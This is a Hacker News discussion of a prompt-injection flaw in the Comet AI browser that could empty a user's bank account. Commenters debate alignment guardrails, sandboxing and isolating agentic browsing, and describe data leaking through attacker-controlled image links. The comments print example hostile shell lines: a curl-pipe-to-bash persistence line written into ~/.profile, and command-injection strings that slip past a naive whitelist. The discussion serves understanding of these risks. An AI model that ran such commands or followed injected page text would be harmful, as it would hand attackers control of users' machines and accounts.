Skip to content(if available)orjump to list(if available)

Comet AI browser can get prompt injected from any site, drain your bank account

ec109685

It’s obviously fundamentally unsafe when Google, OpenAI and Anthropic haven’t released the same feature and instead use a locked down VM with no cookies to browse the web.

LLM within a browser that can view data across tabs is the ultimate “lethal trifecta”.

Earlier discussion: https://news.ycombinator.com/item?id=44847933

It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion this is a bad idea: https://brave.com/blog/comet-prompt-injection/

Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough. The only good mitigation they mention is that the agent should drop privileges, but it’s just as easy to hit an attacker controlled image url to leak data as it is to send an email.

snet0

> Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough.

Maybe I have a fundamental misunderstanding, but I feel like hoping that model alignment and in-model guardrails are statistical preventions, ie you'll reduce the odds to some number of zeroes preceeding the 1. These things should literally never be able to happen, though. It's a fools errand to hope that you'll get to a model where there is no value in the input space that maps to <bad thing you really don't want>. Even if you "stack" models, having a safety-check model act on the output of your larger model, you're still just multiplying odds.

anzumitsu

To play devils advocate, isn’t any security approach fundamentally statistical because we exist in the real world, not the abstract world of security models, programming language specifications, and abstract machines? There’s always going to be a chance of a compiler bug, a runtime error, a programmer error, a security flaw in a processor, whatever.

Now, personally I’d still rather take the approach that at least attempts to get that probability to zero through deterministic methods than leave it up to model alignment. But it’s also not completely unthinkable to me that we eventually reach a place where the probability of a misaligned model is sufficiently low to be comparable to the probability of an error occurring in your security model.

ec109685

The fact that every single system prompt has been leaked despite guidelines to the LLM that it should protect it, shows that without “physical” barriers, you are aren’t providing any security guarantees.

A user of chrome can know, barring bugs that are definitively fixable, that a comment on a reddit post can’t read information from their bank.

If an LLM with user controlled input has access to both domains, it will never be secure until alignment becomes perfect, which there is no current hope to achieve.

And if you think about a human in the driver seat instead of an LLM trying to make these decisions, it’d be easy for a sophisticated attacker to trick humans to leak data, so it’s probably impossible to align it this way.

cobbal

It's a common mistake to apply probabilistic assumptions to attacker input.

The only [citation needed] correct way to use probability in security is when you get randomness from a CSPRNG. Then you can assume you have input conforming to a probability distribution. If your input is chosen by the person trying to break your system, you must assume it's a worst-case input and secure accordingly.

zeta0134

The sortof fun thing is that this happens with human safety teams too. The Swiss Cheese model is generally used to understand how the failures can line up to cause disaster to punch right through the guardrails:

https://medium.com/backchannel/how-technology-led-a-hospital...

It's better to close the hole entirely by making dangerous actions actually impossible, but often (even with computers) there's some wiggle room. For example, if we reduce the agent's permissions, then we haven't eliminated the possibility of those permissions being exploited, merely required some sort of privilege escalation to remove the block. If we give the agent an approved list of actions, then we may still have the possibility of unintended and unsafe interactions between those actions, or some way an attacker could add an unsafe action to the list. And so on, and so forth.

In the case of an AI model, just like with humans, the security model really should not assume that the model will not "make mistakes." It has a random number generator built right in. It will, just like the user, occasionally do dumb things, misunderstand policies, and break rules. Those risks have to be factored in if one is to use the things at all.

skaul

(I lead privacy at Brave and am one of the authors)

> Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough.

No, we never claimed or believe that those will be enough. Those are just easy things that browser vendors should be doing, and would have prevented this simple attack. These are necessary, not sufficient.

petralithic

Their point was that no amount of statistical mitigation is enough, the only way to win the game is to not play, ie not build the thing you're trying to build.

But of course, I imagine Brave has invested to some significant extent in this, therefore you have to make this work by whatever means, according to your executives.

ec109685

This statement on your post seems to say it would definitively prevent this class of attacks:

“In our analysis, we came up with the following strategies which could have prevented attacks of this nature. We’ll discuss this topic more fully in the next blog post in this series.”

cowboylowrez

what you're saying is that the described step, "model alignment" is necessary even though it will fail a percentage of the time. whenever I see something that is "necessary" but doesn't have like a dozen 9's for reliability against failure or something well lets make that not necessary then. whadya say?

skaul

That's not how defense-in-depth works. If a security mitigation catches 90% of the "easy" attacks, that's worth doing, especially when trying to give users an extremely powerful capability. It just shouldn't be the only security measure you're taking.

jrflowers

But you don’t think that, fundamentally, giving software that can hallucinate the ability to use your credit card to buy plane tickets, is a bad idea?

It kind of seems like the only way to make sure a model doesn’t get exploited and empty somebody’s bank account would be “We’re not building that feature at all. Agentic AI stuff is fundamentally incompatible with sensible security policies and practices, so we are not putting it in our software in any way”

ryanjshaw

Maybe the article was updated but right now it says “The browser should isolate agentic browsing from regular browsing”

skaul

That was in the blog from the starting, and it's also the most important mitigation we identified immediately when starting to think about building agentic AI into the browser. Isolating agentic browsing while still enabling important use-cases (which is why users want to use agentic browsing in the first place) is the hard part, which is presumably why many browsers are just rolling out agentic capabilities in regular browsing.

ec109685

That was my point about dropping privileges. It can still be exploited if the summary contains a link to an image that the attacker can control via text on the page that the LLM sees. It’s just a lot of Swiss cheese.

That said, it’s definitely the best approach listed. And turns that exploit into an XSS attack on reddit.com, which is still bad.

petralithic

> It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion this is a bad idea

"It is difficult to get a man to understand something, when his salary depends on his not understanding it." - Upton Sinclair

cma

I think if you let claude code go wild with auto approval something similar could happen, since it can search the web and has the potential for prompt injection in what it reads there. Even without auto approval on reading and modifying files, if you aren't running it in a sandbox it could write code that then modifies your browser files the next time you do something like run your unit tests that it made, if you aren't reviewing every change carefully.

darepublic

I really don't get why you would use a coding agent in yolo mode. I use the llm code gen in chunks at least glancing over it each time I add something. Why the hell would you have an approach of AI take the wheel

ec109685

It still keeps you in the loop, but doesn’t ask to run shell commands, etc.

veganmosfet

I tried this on Gemini CLI and it worked, just add some magic vibes ;-)

ivape

A smart performant local model will be the equivalent of having good anti-virus and firewall software. It will be the only thing between you and wrong prompts being sent every which way from which app.

We’re probably three or four years away from the hardware necessary for this (NPUs in every computer).

ec109685

A local LLM wouldn’t have helped at all here.

ivape

You can’t imagine a MITM LLM that sits between you and the world?

ngcazz

> Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc. will be enough.

In other words: motivated reasoning.

_fat_santa

IMO the only place you should use Agentic AI is where you can easily rollback changes that the AI makes. Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Using agentic AI for web browsing where you can't easily rollback an action is just wild to me.

rapind

I've given claude explicit rules and instructions about what it can and cannot do, and yet occasionally it just YOLOs, ignoring my instructions ("I'm going to modify the database directly ignoring several explicit rules against doing so!"). So yeah, no chance I run agents in a production environment.

gruez

>Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Only if the rollback is done at the VM/container level, otherwise the agent can end up running arbitrary code that modifies files/configurations unbeknownst to the AI coding tool. For instance, running

    bash -c "echo 'curl https://example.com/evil.sh | bash' >> ~/.profile"

Anon1096

You can safeguard against this by having a whitelist of commands that can be run, basically cd, ls, find, grep, the build tool, linter, etc that are only informational and local. Mine is set up like that and it works very well.

gruez

That's trickier than it sounds. find for instance has the -exec command, which allows arbitrary code to be executed. build tools and linters are also a security nightmare, because they can also be modified to execute arbitrary code. And this is all assuming you can implement the whitelist properly. A naive check like

    cmd.split(" ") in ["cd", "ls", ...]
is easy target for command injections. just to think of a few:

    ls . && evil.sh

    ls $(evil.sh)

david_allison

> the build tool

Doesn't this give the LLM the ability to execute arbitrary scripts?

zeroonetwothree

Everything works very well until there is an exploit.

avalys

The agents can be sandboxed or at least chroot’d to the project directory, right?

gruez

1. AFAIK most AI coding agents don't do this

2. even if the AI agent itself is sandboxed, if it can make changes to code and you don't inspect all output, it can easily place malicious code that gets executed once you try to run it. The only safe way of doing this is either a dedicated AI development VM where you do all the prompting/tests, there's very limited credentials present (in case it gets hacked), and the changes are only leave the VM after a thorough inspection (eg. PR process).

psychoslave

Can't the facility just as well try to nuke the repository and every remote it can push force to? The thing is that with prompt injection being a thing, if the automation chain can access arbitrary remote resources, the initial surface can be extremely tiny initially, once it's turned into an infiltrated agent, opening the doors from within is almost a garantee.

Or am I missing something?

frozenport

Yeah we generally don’t give those permissions to agent based coding tools.

Typically running something like git would be an opt in permission.

rplnt

Updating and building/running code is too powerful. So I guess in a VM?

therobots927

It's really exciting to see all the new ways that AI is changing the world.

alexbecker

I doubt Comet was using any protections beyond some tuned instructions, but one thing I learned at USENIX Security a couple weeks ago is that nobody has any idea how to deal with prompt injection in a multi-turn/agentic setting.

hoppp

Maybe treat prompts like it was SQL strings, they need to be sanitized and preferably never exposed to external dynamic user input

prisenco

Sanitizing free-form inputs in a natural language is a logistical nightmare, so it's likely there isn't any safe way to do that.

hoppp

Maybe an LLM should do it.

1st run: check and sanitize

2nd run: give to agent with privileges to do stuff

alexbecker

The problem is there is no real way to separate "data" and "instructions" in LLMs like there is for SQL

Terr_

The LLM is basically an iterative function going guess_next_text(entire_document). There is no algorithm-level distinction at all between "system prompt" or "user prompt" or user input... or even between its own prior output. Everything is concatenated into one big equally-untrustworthy stream.

I suspect a lot of techies operate with a subconscious good-faith assumption: "That can't be how X works, nobody would ever built it that way, that would be insecure and naive and error-prone, surely those bajillions of dollars went into a much better architecture."

Alas, when it comes to day's the AI craze, the answer is typically: "Nope, the situation really is that dumb."

__________

P.S.: I would also like to emphasize that even if we somehow color-coded or delineated all text based on origin, that's nowhere close to securing the system. An attacker doesn't need to type $EVIL themselves, they just need to trick the generator into mentioning $EVIL.

coderinsan

A similar one we found at tramlines.io where AI email clients can get prompt injected - https://www.tramlines.io/blog/why-shortwave-ai-email-with-mc...

pessimist

There should be legal recourse against these companies and investors. It is pure crime to release such obviously broken software.

null

[deleted]

null

[deleted]

charcircuit

Why did summarizing a web page need access to so many browser functions? How does scanning the user's emails without confirmation result in being able to provide a better summary? It seems way to risky to do.

Edit: From the blog post for possible regulations.

>The browser should distinguish between user instructions and website content

>The model should check user-alignment for tasks

These will never work. It's embarrassing that these are even included, considering how models are always instantly jailbroken the moment people get access to them.

stouset

We’re in the “SQL injection” phase of LLMs: control language and execution language are irrecoverably mixed.

Terr_

The fact that we're N years in and the same "why don't you just fix it with X" proposals are still being floated... Is kind of depressing.

esafak

Beside the security issue mentioned in a sibling post, we're dealing with tools that have no measure of their token efficiency. AI tools today (browsers, agents, etc.) are all about being able to solve the problem, with short thrift paid to their efficiency. This needs to change.

snickerdoodle12

probably vibe coded

shkkmo

There were bad developers before there was vibe coding. They just have more output capacity now and something else to blame.

ath3nd

> Why did summarizing a web page need access to so many browser functions?

Relax man, go with the vibes. LLMs need to be in everything to summarize and improve everything.

> These will never work. It's embarrassing that these are even included, considering how models are always instantly jailbroken the moment people get access to them.

Ah, man you are not vibing enough with the flow my dude. You are acting as if any human thought or reasoning has been put into this. This is all solid engineering (prompt engineering) and a lot of good stuff (vibes). It's fine. It's okay. Github's CEO said to embrace AI or get out of the industry (and was promptly fired 7 days later), so just go with the flow man, don't mess up our vibes. It's okay man, LLMs are the future.

paulhodge

Imagine a browser with no cross-origin security, lol.